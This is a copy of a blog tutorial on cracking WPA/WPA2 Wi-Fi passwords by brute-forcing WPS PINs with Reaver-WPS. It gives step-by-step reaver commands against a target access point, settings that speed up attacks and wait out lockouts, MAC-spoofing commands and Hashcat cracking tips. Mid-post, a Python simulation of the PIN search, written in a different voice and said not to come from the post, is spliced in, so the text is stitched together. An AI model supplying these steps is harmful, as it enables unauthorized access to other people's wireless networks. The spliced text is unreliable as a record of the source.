Cracking Wifi WPA/WPA2 passwords using Reaver-WPS - blackMORE Ops
22/12/2014 - Cracking Wifi WPA/WPA2 passwords using Reaver-WPS - blackMORE Ops
http://www.blackmoreops.com/2013/10/12/crackingwifiwpawpa2passwordsusingreaverwps/
Cracking Wifi WPA/WPA2 passwords using Reaver-WPS
This entry was posted in Cracking, Hacking, Linux, Reaver, Wifi, Wireless and tagged Cracking, Reaver-WPS, Wifi, WPA2 on October 12, 2013 by blackMORE Ops (updated 13 days ago).
[Image: reaver-wps - Brute force attack against Wifi Protected Setup]
Overview:
Reaver-wps performs a brute force attack against an access point's WiFi Protected Setup pin number. Once the WPS pin is found, the WPA PSK can be recovered and, alternately, the AP's wireless settings can be reconfigured. This post outlines the steps and commands that help crack Wifi WPA/WPA2 passwords using Reaver-WPS.
While Reaver-wps does not support reconfiguring the AP, this can be accomplished with wpa_supplicant once the WPS pin is known.
Readers, note that I've since written another post where I could crack a password in 14.21 seconds using a pyrit, cowpatty and WiFite combination attack with a dictionary. The whole process takes less than 10 minutes.
Those who would like to try more ways of cracking Wifi WPA/WPA2 passwords can also use Hashcat, cudaHashcat or oclHashcat to crack unknown Wifi WPA/WPA2 passwords. The benefit of using Hashcat is that you can create your own rule to match a pattern and do a brute force attack. This is an alternative to a dictionary attack, where the dictionary can only contain a certain number of words, whereas a brute force attack lets you test every possible combination of a given charset. Hashcat can crack Wifi WPA/WPA2 passwords and you can also use it to crack MD5, phpBB, MySQL and SHA1 passwords. Using Hashcat is a good option if you can guess 1 or 2 characters of a password; it then only takes a few minutes. For example, if you know 3 characters of a password it takes 12 minutes to crack it; if you know 4 characters it takes 3 minutes. (These timings depend on your GPU and on the password length: the number of candidates grows as the charset size raised to the number of unknown positions.) You can make rules to only try letters and numbers to crack a completely unknown password if you know a certain router's default passwords contain only those. The chance of cracking is a lot higher this way.
Important Note: Many users try to capture with network cards that are not supported. You should purchase a card that supports Kali Linux, including injection and monitor mode etc. A list can be found in 802.11 Recommended USB Wireless Cards for Kali Linux. It is very important that you have a supported card, otherwise you'll just be wasting time and effort on something that just won't do the job.
Description:
Reaver-wps targets the external registrar functionality mandated by the WiFi Protected Setup specification. Access points will provide authenticated registrars with their current wireless configuration (including the WPA PSK), and also accept a new configuration from the registrar.
In order to authenticate as a registrar, the registrar must prove its knowledge of the AP's 8 digit pin number. Registrars may authenticate themselves to an AP at any time without any user interaction. Because the WPS protocol is conducted over EAP, the registrar need only be associated with the AP and does not need any prior knowledge of the wireless encryption or configuration.
Reaver-wps performs a brute force attack against the AP, attempting every possible combination in order to guess the AP's 8 digit pin number. Since the pin numbers are all numeric, there are 10^8 (100,000,000) possible values for any given pin number. However, because the last digit of the pin is a checksum value which can be calculated from the previous 7 digits, that keyspace is reduced to 10^7 (10,000,000) possible values.
The keyspace is reduced even further due to the fact that the WPS authentication protocol cuts the pin in half and validates each half independently: the AP answers the registrar's M4 message with M5 only if the first half is correct, and answers M6 with M7 only if the second half is correct (otherwise it sends a NACK). That means that there are 10^4 (10,000) possible values for the first half of the pin and 10^3 (1,000) possible values for the second half of the pin, with the last digit of the pin being a checksum.
Reaver-wps brute forces the first half of the pin and then the second half of the pin, meaning that the entire keyspace for the WPS pin number can be exhausted in 11,000 attempts. The speed at which Reaver can test pin numbers is entirely limited by the speed at which the AP can process WPS requests. Some APs are fast enough that one pin can be tested every second; others are slower and only allow one pin every ten seconds. Statistically, it will only take half of that time in order to guess the correct pin number.
Installation:
Install Kali Linux; everything is built into it (Reaver-wps, libpcap and libsqlite3).
Usage:
Usually, the only required arguments to Reaver-wps are the interface name and the BSSID of the target AP:
# reaver -i mon0 -b 00:01:02:03:04:05
The channel and SSID (provided that the SSID is not cloaked) of the target AP will be automatically identified by Reaver-wps, unless explicitly specified on the command line:
# reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksys
By default, if the AP switches channels, Reaver-wps will also change its channel accordingly. However, this feature may be disabled by fixing the interface's channel:
# reaver -i mon0 -b 00:01:02:03:04:05 --fixed
The default receive timeout period is 5 seconds. This timeout period can be set manually if necessary (minimum timeout period is 1 second):
# reaver -i mon0 -b 00:01:02:03:04:05 -t 2
The default delay period between pin attempts is 1 second. This value can be increased or decreased to any non-negative integer value. A value of zero means no delay:
# reaver -i mon0 -b 00:01:02:03:04:05 -d 0
Some APs will temporarily lock their WPS state, typically for five minutes or less, when suspicious activity is detected. By default, when a locked state is detected, Reaver-wps will check the state every 315 seconds (5 minutes and 15 seconds) and not continue brute forcing pins until the WPS state is unlocked. This check interval can be increased or decreased to any non-negative integer value:
# reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250
For additional output, the verbose option may be provided. Providing the verbose option twice will increase verbosity and display each pin number as it is attempted:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv
The default timeout period for receiving the M5 and M7 WPS response messages is .1 seconds. This timeout period can be set manually if necessary (max timeout period is 1 second):
# reaver -i mon0 -b 00:01:02:03:04:05 -T .5
Some poor WPS implementations will drop a connection on the floor when an invalid pin is supplied instead of responding with a NACK message as the specs dictate. To account for this, if an M5/M7 timeout is reached, it is treated the same as a NACK by default. However, if it is known that the target AP sends NACKs (most do), this feature can be disabled to ensure better reliability. This option is largely useless as Reaver-wps will auto-detect whether an AP properly responds with NACKs or not:
# reaver -i mon0 -b 00:01:02:03:04:05 --nack
While most APs don't care, sending an EAP FAIL message to close out a WPS session is sometimes necessary. By default this feature is disabled, but it can be enabled for those APs that need it:
# reaver -i mon0 -b 00:01:02:03:04:05 --eap-terminate
When 10 consecutive unexpected WPS errors are encountered, a warning message will be displayed. Since this may be a sign that the AP is rate limiting pin attempts or simply being overloaded, a sleep can be put in place that will occur whenever these warning messages appear:
# reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait=360
More on Basic Usages
First, make sure your wireless card is in monitor mode:
# airmon-ng start wlan0
To run Reaver, you must specify the BSSID of the target AP and the name of the monitor mode interface (usually mon0, not wlan0, although this will vary based on your wireless card/drivers; newer aircrack-ng releases name it wlan0mon instead, so use whatever airmon-ng reports):
# reaver -i mon0 -b 00:01:02:03:04:05
You will probably also want to use -vv to get verbose info about Reaver's progress:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv
Speeding Up the Attack
By default, Reaver-wps has a 1 second delay between pin attempts. You can disable this delay by adding -d 0 on the command line, but some APs may not like it:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0
Another option that can speed up an attack is --dh-small. This option instructs Reaver to use small Diffie-Hellman secret numbers in order to reduce the computational load on the target AP:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small
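To make the keyspace arithmetic from the Description section and the -d / --lock-delay trade-off from this section concrete, here is an added example of my own; it is not code from the blackMORE Ops post or from reaver. It implements the WPS checksum digit, assembles candidate PINs from a 4-digit and a 3-digit half, and runs Reaver's two-phase search against a constructed model AP on a simulated clock. The AP model, its lock rule (10 failures within 15 seconds locks WPS for 300 seconds) and the 1-second-per-pin processing time are assumptions chosen for illustration; reaver's real search order and the dummy digits it sends for the second half during phase 1 may differ. No radio traffic is involved.

```python
"""Simulation of the split WPS PIN search that Reaver performs.

Added example, not code from blackMORE Ops or from reaver itself. The
access point is a constructed model: it confirms the first half of the
PIN (the AP's M5 reply) and the second half (its M7 reply) the way the
post describes, and locks WPS for a while when too many failures arrive
too quickly. Lock thresholds and timings are assumptions.
"""
from dataclasses import dataclass, field


def wps_checksum(pin7: int) -> int:
    """Checksum digit that WPS appends to the first 7 digits of a PIN."""
    accum = 0
    while pin7:
        accum += 3 * (pin7 % 10)   # odd positions (from the right) weigh 3
        pin7 //= 10
        accum += pin7 % 10         # even positions weigh 1
        pin7 //= 10
    return (10 - accum % 10) % 10


def full_pin(first_half: int, second_half: int) -> str:
    """Assemble 4 digits + 3 digits + checksum into the 8-digit PIN string."""
    seven = first_half * 1000 + second_half
    return f"{seven:07d}{wps_checksum(seven)}"


@dataclass
class ModelAP:
    """Hypothetical AP: validates the PIN in halves and rate-limits."""
    pin: str
    lock_after: int = 10          # consecutive failures that trigger a lock...
    window: float = 15.0          # ...if they arrive within this many seconds
    lock_seconds: float = 300.0   # post: "typically five minutes or less"
    locked_until: float = 0.0
    failures: list = field(default_factory=list)

    def is_locked(self, now: float) -> bool:
        return now < self.locked_until

    def _record_failure(self, now: float) -> None:
        self.failures = [t for t in self.failures if now - t <= self.window]
        self.failures.append(now)
        if len(self.failures) >= self.lock_after:
            self.locked_until = now + self.lock_seconds
            self.failures.clear()

    def try_pin(self, candidate: str, now: float):
        """Return (first_half_ok, second_half_ok); None while WPS is locked."""
        if self.is_locked(now):
            return None
        if candidate[:4] != self.pin[:4]:      # NACK instead of M5
            self._record_failure(now)
            return (False, False)
        if candidate[4:] != self.pin[4:]:      # NACK instead of M7
            self._record_failure(now)
            return (True, False)
        self.failures.clear()
        return (True, True)


def brute_force(ap: ModelAP, ap_seconds_per_pin: float = 1.0,
                delay: float = 1.0, lock_delay: float = 315.0):
    """Reaver-style search: 10^4 first halves, then 10^3 second halves.

    delay models -d, lock_delay models --lock-delay, ap_seconds_per_pin the
    AP's own WPS processing time. Returns (pin, attempts, simulated seconds).
    """
    clock = 0.0
    attempts = 0

    def attempt(candidate: str):
        nonlocal clock, attempts
        while ap.is_locked(clock):           # poll the lock, as --lock-delay does
            clock += lock_delay
        attempts += 1
        result = ap.try_pin(candidate, clock)
        clock += ap_seconds_per_pin + delay
        return result

    for h1 in range(10_000):                 # phase 1: second half is a dummy 000
        if attempt(full_pin(h1, 0))[0]:
            break
    else:
        raise RuntimeError("first half not found")
    for h2 in range(1_000):                  # phase 2: checksum fixed by the 7 digits
        if attempt(full_pin(h1, h2)) == (True, True):
            return full_pin(h1, h2), attempts, clock
    raise RuntimeError("second half not found")


if __name__ == "__main__":
    pin, n, secs = brute_force(ModelAP("12345670"))
    print(f"recovered {pin} after {n} attempts, {secs / 3600:.1f} simulated hours")
```

The worst-case PIN for this search order is 99999995 (7 nines plus their checksum), which costs exactly 10,000 + 1,000 attempts. Running brute_force with delay=0.0 against the same model AP trips the lock every ten attempts, which is the behaviour the post warns some APs may exhibit: the same number of attempts then takes many times longer on the simulated clock than with the default 1-second delay.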
MAC Spoofing
In some cases you may want/need to spoof your MAC address. Reaver supports MAC spoofing with the --mac option, but you must ensure that you have spoofed your MAC correctly in order for it to work.
Changing the MAC address of the virtual monitor mode interface (typically named mon0) WILL NOT WORK. You must change the MAC address of your wireless card's physical interface before starting the monitor interface, so that the monitor interface inherits the new address and it matches what you pass to --mac. For example:
# ifconfig wlan0 down
# ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69
# ifconfig wlan0 up
# airmon-ng start wlan0
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --mac=00:BA:AD:BE:EF:69
On systems without ifconfig, the iproute2 equivalent (with the interface down) is:
# ip link set dev wlan0 address 00:BA:AD:BE:EF:69
Pick a unicast address (lowest bit of the first octet clear); the kernel refuses to assign a multicast address to an interface.
Supported Wireless Drivers
The following wireless drivers have been tested or reported to work successfully with Reaver-wps:
ath9k, rtl8187, carl9170, ipw2000, rt2800pci, rt73usb
Partially Supported
The following wireless drivers have had mixed success, and may or may not work depending on your wireless card (i.e., if you are having problems with these drivers/cards, consider trying a new card before submitting a trouble ticket):
ath5k, iwlagn, rt2800usb (using the latest compat-wireless drivers has fixed many users' problems, hint hint...), b43
Not Supported
The following wireless drivers/cards have been tested or reported to not work properly with Reaver:
iwl4965, RT3070L, Netgear WG111v3
Conclusion
If you want to pentest or hack your Wifi passwords, then the first thing you need is a compatible Wifi card. Most Wifi cards are priced between $15 and $35 USD. I see no point struggling with an unsupported card when you can just invest those extra bucks and that card will last you years. You get to learn how to pentest or hack Wifi passwords, how to inject, spoof, and set up a fake AP or honeypot. See the list of supported USB Wifi adapter cards that work in Kali Linux and are available on Amazon.
Related post: Speed up WPA/WPA2 cracking with Pyrit and CUDA and leveraging Wifite [This post is now replaced and updated by the next one below]
Cracking Wifi WPA/WPA2 passwords using pyrit cowpatty in Kali Linux
About blackMORE Ops: blackMORE Ops is dedicated to How to, Guides, Security features and Tips and Tricks for Linux OS. Thank you for visiting us and follow us here: www.blackmoreops.com.